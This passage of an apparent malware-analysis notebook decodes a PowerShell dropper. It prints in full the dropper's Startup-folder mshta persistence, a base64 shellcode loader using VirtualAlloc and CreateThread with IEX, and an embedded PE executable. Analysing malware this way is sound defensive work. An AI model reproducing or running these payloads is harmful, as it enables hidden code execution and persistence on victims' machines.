AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
[Byte[]]$DllBytes = [System.Convert]::FromBase64String($fBfivE);
[System.IO.File]::WriteAllBytes($zyiXOUZV,$DllBytes);
	


$JPgRSH = "$Env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"

$IoyUaCe = New-Object -comObject WScript.Shell
$rejZwfMB = $IoyUaCe.CreateShortcut($JPgRSH + "\qfCRue.lnk");
$rejZwfMB.TargetPath = "%SystemRoot%\system32\mshta.exe"
$rejZwfMB.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$rejZwfMB.Arguments = '                                                                                                                                                   
                                                                                   '+ $ogUoi
$rejZwfMB.Save()

Start-Process -windowstyle Hidden -FilePath "mshta.exe" -ArgumentList "$ogUoi"
```



Using the following script, we can decode the first bas64 encoded blob and see the contents.<br>

In [ ]:
import base64

base64Enc = "DQoja3dqQ1FvYlNRVg0KI2t3akNRb2JTUVYNCiNrd2pDUW9iU1FWDQoNCiRTck5pbiA9IEAnDQpmdW5jdGlvbiBmdW5jX2dldF9wcm9jX2FkZHJlc3Mgew0KCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkNCgkkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcyA9IChbQXBwRG9tYWluXTo6Q3VycmVudERvbWFpbi5HZXRBc3NlbWJsaWVzKCkgfCBXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoJ1xcJylbLTFdLkVxdWFscygnU3lzdGVtLmRsbCcpIH0pLkdldFR5cGUoJ01pY3Jvc29mdC5XaW4zMi5VbnNhZmVOYXRpdmVNZXRob2RzJykNCgkNCglyZXR1cm4gJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRQcm9jQWRkcmVzcycpLkludm9rZSgkbnVsbCwgQChbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZl0oTmV3LU9iamVjdCBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmKChOZXctT2JqZWN0IEludFB0ciksICgkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldE1vZHVsZUhhbmRsZScpKS5JbnZva2UoJG51bGwsIEAoJHZhcl9tb2R1bGUpKSkpLCAkdmFyX3Byb2NlZHVyZSkpDQp9DQoNCmZ1bmN0aW9uIGZ1bmNfZ2V0X2RlbGVnYXRlX3R5cGUgew0KCVBhcmFtICgNCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDAsIE1hbmRhdG9yeSA9ICRUcnVlKV0gW1R5cGVbXV0gJHZhcl9wYXJhbWV0ZXJzLA0KCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMSldIFtUeXBlXSAkdmFyX3JldHVybl90eXBlID0gW1ZvaWRdDQoJKQ0KCQ0KCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkNCgkkdmFyX3R5cGVfYnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcignUlRTcGVjaWFsTmFtZSwgSGlkZUJ5U2lnLCBQdWJsaWMnLCBbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsICR2YXJfcGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygnUnVudGltZSwgTWFuYWdlZCcpDQoJJHZhcl90eXBlX2J1aWxkZXIuRGVmaW5lTWV0aG9kKCdJbnZva2UnLCAnUHVibGljLCBIaWRlQnlTaWcsIE5ld1Nsb3QnLCAkdmFyX3JldHVybl90eXBlLCAkdmFyX3BhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoJ1J1bnRpbWUsIE1hbmFnZWQnKQ0KCQ0KCXJldHVybiAkdmFyX3R5cGVfYnVpbGRlci5DcmVhdGVUeXBlKCkNCn0NCg0KW0J5dGVbXV0kWHpMUEhlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygia0hFQ0l2L280ZzBBQUdqamlvQ0FRd3RBMVF0c0EwUVUwOWJYYUpLTGdJQUxXQVZiandTQ2dZQ0E2SlpaMFNqVGFHV0xnSUFMY09qTkFxNW0wMmhZaTRDQUMzam9yaGZZejlOb1M0dUFnQW5GZU9oQk9SN2swMmc5aTRDQUNjVjA2RmhMQ05iVGFDK0xnSUFKeFhEb09UN3l1Tk5vSVl1QWdBbkZiT2l4OUR6LzAyZ1RpNENBQ2NWb0RjVVVPc1NBZ0lCb2M0cUFnRWZGRk1TQWdJRG1SOFZFaFlBTnhWalFEY1VVME9xQTZvRHFoT3FBNm9EcWdBdkZpTkRxZ0g5V0JVRDA2T3JBNklDUWdJQUx4WkRRNm9BTHhWalFmMWNMV0FWYjlNOE54WHpRQzhXUTBBdkZqTkRUQzhWWTBIL1ZlQXZGZkx2RmtQV3o2RXlDZ0lEcXdIL1ZhQXR3QlhiMG8wZUdoNENCZ05ZTHhWelFmOVYwQ1I0NGdJQ0ExZ3ZGWE5CLzFYQUx4VnpRZjlWczM5N2JDMlhkUW95QUVOVUxiQUZFTkg1L2Y5UFcxd25OZE9ZSjFYb0p4WHpvRFQxQnYyaGNpWUNBMEdnK2lvQ0FDM0RveW8xT2lXaEtpWUNBMEdnc2lvQ0FDY1ZRNk9UREIxWm9ONG1BZ05Cb0dZcUFnQW5GVE9nWUVzR0FhSXlLZ0lEUWYxWUxXT2k5S0paYTAyajhpb0NBQzNqb2RDWFBRdE5vNzRxQWdBbkZjT2pyaVAzRTAyamhpb0NBQ2NWczZIWXhnSC9UYU5PS2dJQUp4V2pvZFJoQTdOTm94WXFBZ0FuRlpPaWtuWmxsMDJpM2lvQ0FDY1ZnNkNhOU5ZTFRhS21LZ0lBSnhWVG9rWVNpeStnZ0VzR0FhQmVKZ0lEUWYxYlFhSTZLZ0lBSnhWem9TaGdIYTlOb2dJcUFnQW5GV09qaW9hMm42Q2dTd1lCbzdvbUFnTkIvVnRCb1pZbUFnQXR3czF2cWdPcUE2b0RxZ09nd0VzR0FhTStKZ0lEUWYxY0xlQVYvandUMGdZQ0E2b0RxZ09xRDZvRHFnSTgzeFhyUUM4VjgwTmQvMVhBRlFJOEUwWUdBZ09xQTZJQ0FnQVRxZ09xQTZvQUwxWFRTNm9EUWY5VnNDY1ZJQS8xSWdJOEVyWUdBZ0FQOWtJRDFrZXFBNm9EcWdPcUFDOFZJMEgvVmFHdVI2b0RxZ09wL0M4V1EwQXZGU05CLzFXZ0ZRSThFZllDQWdPcUE2b2ZvZ0hCOS93dkZTTkIvMVZ6UWY5VllSOFZBaFlHQWdMTkFDY1U4RGNVODBBM0ZRTkFOQlRkK2YzL1E2b0VMeFVqUWY5VlVCVUNQQkQyQWdJRG9jQkxCZ0dnRmlJQ0EwQTBGTjM1L2Y5Qi8xVXdGUUk4RklJQ0FnRWZGUUlXQmdJQ3pRQW5GUEEzRlBOQU54VURRRFFVM2ZuOS8wT3FGQzhWSTBIL1ZWQVZBOVBnTkJUZCtmMy9RZjFiWkNjVkFBZjFBZ0lEQWdQZmlBLzFBZ1BiYzZzRG9nSkNBZ0F2RlFORHFnSC9WVUF2VmpBbUNDOFdJQzlWQUNaQUx4WXdEdUlEMHQ3TkFDY1ZFQy9XTUM3WnJpWVAxUkF2RlJLbkZRQTNGUk5BTHhVRFExZ3ZGU05CLzFXUUZRUFNHQS8xRWdQZGRBLzFBZ1BXQ000SFhmOVZnQzBQZjN0c0xaZDFDaklDQWdJRDM2ZTdwN3VYMGdQWHo1Zkt6c29DQTdmUDI0L0wwZ0lETjcvcnA3T3pocjdXdXNLQ280Ky90OE9IMDZlTHM1YnVnemRQSnhhQzVyckM3b05mcDd1VHY5L09nenRTZ3RxNnd1NkRVOHVuazVlNzByN1d1c0ttQTlPWDQ5Sy93N09IcDdydWc0K2poOHZQbDlMMzE5T2F0dUlDQWdHaC9oSUNBUXd0QTA5YlgxUU5FY0FuTXBJUUxXZ21FcE9qS2pVNkphRUtHZ0lEUWFDU0hnSUFKeEtTTUEveWtqSUNQQkEyQWdJQUx3N2dKeEtTSUM4U2toQTNZbUF2RXBJU1BOOENVZzFnTHhLU0VqemZ3aHM0RmR2em94Z3ZFcElRTHdMU0R3NHdEKzVDQTlhb0QvS1NJZ1A3SzZzRG9nSkNBZ0F2VXBKRFMwSC9VcEp3TGVBbjdpQXZVcElnTFIyZ25ob0NBYTZjTGErckE2SUNRZ0lBTDFaRFMwSC9VcEp3TGVBdk5rQXZWbElPVXBBdEhhTzJHZ0lBSis0Z0RRNmpPOVJrRFJKRGQzOTdiUTliWEEwUnNDZFNraEFtRXBBdUVwT1lCdU0zYWp3VUVnSUNBQzhDOEM1U2tnMElMT0NDQWdJQ0RlZ3NBSklDQWdBVkE5dW9GZi9UbWE5a0xoNE9FcEFuRXBJZ0xUd05CaUF2M2hBTnVpRkZ1YTdhUE40RUxVT1lCWW4rUGp6ZFNDZFNra0k4M1VFRnFqQU5xZy9XV0M4U2tpSVBFcEpBSnhLU01DOFNrakF2VXBJU0JrTTREUVlJRmR2OUdDOGVFZzBjTGVBTy9nUFNHQS8rRWdQVWNBMFNVMzk1RDA5YlgxUU5FYUFtRXBFYkVwSVNBNkEwOVFiOW8yNFdBZ05Cb3ZZYUFnQW5FcEpEb2Y1LzhTZWc0RmNHQWFDcUZnSURRZjlTa21OQm9uNGFBZ0FuRXBKUUQvS1NRZ0k4RVlZQ0FnQVA4cEpTQWp3UldnSUNBQzRTazVnRzR6ZHFQQlVpQWdJQUx3THdMbEtTRFFnc29BSUNBZ0lOcUN3QUVnSUNBdTZ5a2p3VVFnSUNBQlVDUEJRaUFnSUJHeEtTRWdXa1hnSUNBQzhXTWc0U2swSC9VcEpRSnhLU0lBL3lraUlEMjVRUDlnSUQwaUF2ZGdJT2NwR3VHQzkyUWc1eWtDL1dRZzdTa2E4TjNSNENBZ0FEMmxBRm5mMytBZ05jTHhLU00wSC9VcEp3SmhtdWNDNFNrZzBjSnhLU01DOFNrakFOQWd0QUx4S1NNMEgvVXBKd0poZ08rZ1BTb0EwT0VBMGFFQzdzRmYvVTNBMFdVQS8yQWdJOEYrSDkvZndQOWtJQ1BCZTUvZjM5R3hLU0VnWTgyeEtTRUEwU1kzZC9lMjBPQWdPdmw4dTdsN0xPeXJ1VHM3SUNBZ0lEVkMyd0RSSGpUMXRlelFBbkZmT2pLalU2SmFKQ0VnSURRYUhLRWdJQUxlQVYvandSQ2dJQ0FDOFdJQzhDOGc4V0lDY1Y0QS8xNGdJOEVMSUNBZ0F2MWVPckE2SUN3Z0lBTHh0RFFDOGEwMEg5WEMxZ0ZXL1dSNnNEb2dLQ0FnQXZHME5EcWdIOVhDMWdGVy9UOTZzRG9nSkNBZ0F2RzBORFRmMWZxd09pQWtJQ0FDOGJVME5OL1Z3dk8xQXZWaUF0RGFGYURnSUFMODd3TGU0TjNDZjYwQzA0TDFYZ0x4WWhvSDN4L2Z3dkd0QXZWZUt2Q3RBVkE5SWtMVUF0RGFNMTlmMzhMUTJocWZYOS9CRUQwbkF2R3FJTkhDM0RxZ09xQjEzOVdCRUQwaFFuZGZHdUZzMEFKeFh3THhYemYzdHZaMmQxQ2hJQUxRTmJSQ0l5a0JWTDJtQXR3anphT0JFbjBpN3FNcFBTR2p6YU1wTENPd01yMWFOcmVROVVMYkFORVpOUFcxMGJGZjREbytOeTcxV2gxZ29DQTBHaFhnNENBQzFqb1VJUGNpV2hqZ29DQTBHaEZnNENBQ2NWNDZIU1ZFekJvVUlLQWdOQm9Nb09BZ0F0dzZPWEJleWRvUG9LQWdOQm9JSU9BZ0F0NDZMSDBQUDlvTElLQWdOQm9Eb09BZ0FuRmRPZ2RudXZqYUJtQ2dJRFFhUHVEZ0lBSnhYQUZXL1dTQS8xNGdQV01CWGIxaUFWL2p3UU5nSUNBNm9EcWdPcUQ2b0RxZ2VpQWdJQUFDOFdJMEg5VEMxZ0RlMy8wOGVxQTAzOVhDM2dGZi9iajErckFmOVYwQ2NWb0EvMW9nUFRVNm9BTnhXelExd3ZGYU5EVGY5VjRDOFZvQWJqbTV1Ym05STRMeFdnRFFJUUJ1T2JtNXViMXJ3dkZhQU5BaUFuRlpBdFhBMnFJTWVZTHhXUm9WSDUvZnd2RlpOQm9VMzEvZnd2RmFOQi8xWEJHeFgrQjAzOVdqemJGZjkvZTJ3dGwzVUtFZ05QVzE5VUJSR1IrZjM5b1VZR0FnQXQ0NkJ3NE9pYlhhQ3lDZ0lBTGNPZ29iWEpPMTJnZmdvQ0FDMmpvTFRiTkFkZG9Fb0tBZ0F0WTZJSVg2NVhYYUFXQ2dJQUpoS1RvM2VqSmh0ZG85NEtBZ0FuRXBJVG9qS3FPYWRkbzZJS0FnQW5FcElqb2hJR0FnQTNFcEpuUTZJd1p3WUJvVUlHQWdOQi9WdXFBRGNTa21kQi9VK3FFRGNTa21kQi8xS1NJNktRWndZQm9MNEdBZ05BTnhLU1owSC9VcEl3TnhLU1YwSC9VcEl3TGVBM0VwSXc2aVlDQWdHajhnWUNBQTIrRnMzWXpzUWpjdkpVQS9MU01nUFdURGNTa2xkQm9mSDEvZndSQTlJVkd4TFNNZ2VpUXA0Q0FmMVhHd3dCN3V2VlVhMDRCUkp5QmdJRGQzOTdiUTZYaDhQRGs0ZlRocGR6RzdPSHo2TkRzNGZubDhvQ0FnTnp3N1BYbnNhN2s0ZlNBZ05QVzE5VURSR3hvWElDQWdBdDRPelFid1lDRGUrZ29iWEpPYUNHQWdJRFFhQU9CZ0lBSnhLU002RXdYa0tWb0RZQ0FnTkJvNzRHQWdBbkVwSkErakJQQmdLdGUwMmdlZ0lDQWcwYlE2R1Fad1lCb1VZQ0FnTkJvdzNWL2Z3Ty9nUFNGRGUrRWE0S3piUTNmK2d2MzZzNEZkdngxeHRVTnhLU0UwQTNFcEl6UURjL3VEY09DanplVGFMWjJmMzhFUVBTSmY1U2s2b0IvMUtTVUEwTys2TEQxZ0lCLzFLU1F6dlZMYXowRFJKVGQzOTdiUSszejZlWDQ1ZU91NWZqbGdOVUxiTkdwUU9RTHdMQUx3SXdMMEp3THdvZ0x5cUFMa3VZRCtZeXo5WEVKeFh3THhYelozVVBWQzJ6UmFJQ0FnSURhQVdxaEdzR0FDZFY4QzhWODJkMUREY0NBMHdWSjlveVBOcG9JbU1EQ3lRVko5M1RiUXhBRlV2YUpSb0NBd01vRlV2ZDNRd3RBMVF0c2FEaC9mMytEeFlqZFFvU0FFTlVMYkFGRWdIeC9mOU96V3cwTmdIeC9md3RET29pQWdJQjNRSUdBZ0lEMmlWRm90YUFET0cxcmdsRm95dlZxQ1lIREEwR0VBWHVBZ1lDQTlWVURTSDhMMVlocm00ODJTVHQvZ0lDQW8xaXpTd3NNRFlCOGYzOUJhSWl6U0F0QndvODJpZ1JKOVY1M1VOc0xaZDFDaElEVkMyd0RSR2pUMXRjTDNZaXpRQW5GZkF0RDVnRzR6ZHFQQlN1QWdJQUx3THdMVTROQ0FialF4WUNBandVWWdJQ0FDOGo0ZzBvSnpYZ0x3UHdKeFhRTHhYZ0p4V2dMeFdnTHdKUUZRUFQ2Qzgxb0M4bWdnMG9KelhBTGVNOEZmL0xveDdOMkMwYURRSU5BZzhWd0M0Q0RRd25GYkF2RmJOQm9rMzkvZjd2RmpQWERDOFZvQzhDa2cwTUxWb05TZzBLUE40QUwxV2dMMHB5RFU0ODNRSU5BZzBDRFVBdUNnME1KeFh3TDFYZ0xTb1BOZEF2RmZMdEk4bys3VVBlTHMwQUp4WHhyaE1iUDlSc0x4WHpmM3RzTFpkMUNpSUFOd0lCRERjQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJS0FnSUN2K09yWnNvQ0FnSUNBZ0lEUWdPYnM0ZlBvOE96aCtlWHlydTNwNC9MdnNMU3dzYTdqNysyQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ05DQTVPLzM3dXp2NGVTdTdlbmo4dSt3dExDeHJ1UHY3WUR2N1lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBY0FSbWcrNEFOUUFBQUFCNENGV0I4d0FBQUFCZFpvWC9mUVpUWnJzL3BWdUg3WVgva1B4YVVwRDhXRkJhdWVJTkFBQ0FNb0NEd2dHRDZRR0QrUUIxOGxENFVrcGErVmovMEhNQ0N0djF3Z0FBIikNCg0KDQoJCQ0KJEJlUUFiZ3UgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWxsb2MpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pKSkuSW52b2tlKFtJbnRQdHJdOjpaZXJvLCAkWHpMUEhlLkxlbmd0aCwweDMwMDAsIDB4NDApDQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRYekxQSGUsIDAsICRCZVFBYmd1LCAkWHpMUEhlLmxlbmd0aCkNCg0KJHFYdHh3YXdNID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoKGZ1bmNfZ2V0X3Byb2NfYWRkcmVzcyBrZXJuZWwzMi5kbGwgQ3JlYXRlVGhyZWFkKSwgKGZ1bmNfZ2V0X2RlbGVnYXRlX3R5cGUgQChbSW50UHRyXSwgW1VJbnQzMl0sIFtJbnRQdHJdLCBbSW50UHRyXSwgW1VJbnQzMl0sIFtJbnRQdHJdKSAoW0ludFB0cl0pKSkuSW52b2tlKFtJbnRQdHJdOjpaZXJvLDAsJEJlUUFiZ3UsW0ludFB0cl06Olplcm8sMCxbSW50UHRyXTo6WmVybykNCltTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKChmdW5jX2dldF9wcm9jX2FkZHJlc3Mga2VybmVsMzIuZGxsIFdhaXRGb3JTaW5nbGVPYmplY3QpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbSW50MzJdKSkpLkludm9rZSgkcVh0eHdhd00sMHhmZmZmZmZmZikgfCBPdXQtTnVsbA0KJ0ANCg0KDQpJZiAoW0ludFB0cl06OnNpemUgLWVxIDgpIHsNCglzdGFydC1qb2IgeyBwYXJhbSgkYSkgSUVYICRhIH0gLVJ1bkFzMzIgLUFyZ3VtZW50ICRTck5pbiB8IHdhaXQtam9iIHwgUmVjZWl2ZS1Kb2INCn0NCmVsc2Ugew0KCUlFWCAkU3JOaW4NCn0="
print(base64.b64decode(base64Enc))

b'\r\n#kwjCQobSQV\r\n#kwjCQobSQV\r\n#kwjCQobSQV\r\n\r\n$SrNin = @\'\r\nfunction func_get_proc_address {\r\n\tParam ($var_module, $var_procedure)\t\t\r\n\t$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\'\\\\\')[-1].Equals(\'System.dll\') }).GetType(\'Microsoft.Win32.UnsafeNativeMethods\')\r\n\t\r\n\treturn $var_unsafe_native_methods.GetMethod(\'GetProcAddress\').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod(\'GetModuleHandle\')).Invoke($null, @($var_module)))), $var_procedure))\r\n}\r\n\r\nfunction func_get_delegate_type {\r\n\tParam (\r\n\t\t[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,\r\n\t\t[Parameter(Position = 1)] [Type] $var_return_type = [Void]\r\n\t)\r\n\t\r\n\t$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Sy

The 2nd base64 encoded blob will decoded to an PE executable as we can see from the output in the following code snippet.<br>
The hash of the exe is **6c954a003270e0ca9d858b31caffe29f647ca51da179e7f80d581a7ffcba3148**

In [ ]:
import base64

base64Enc = "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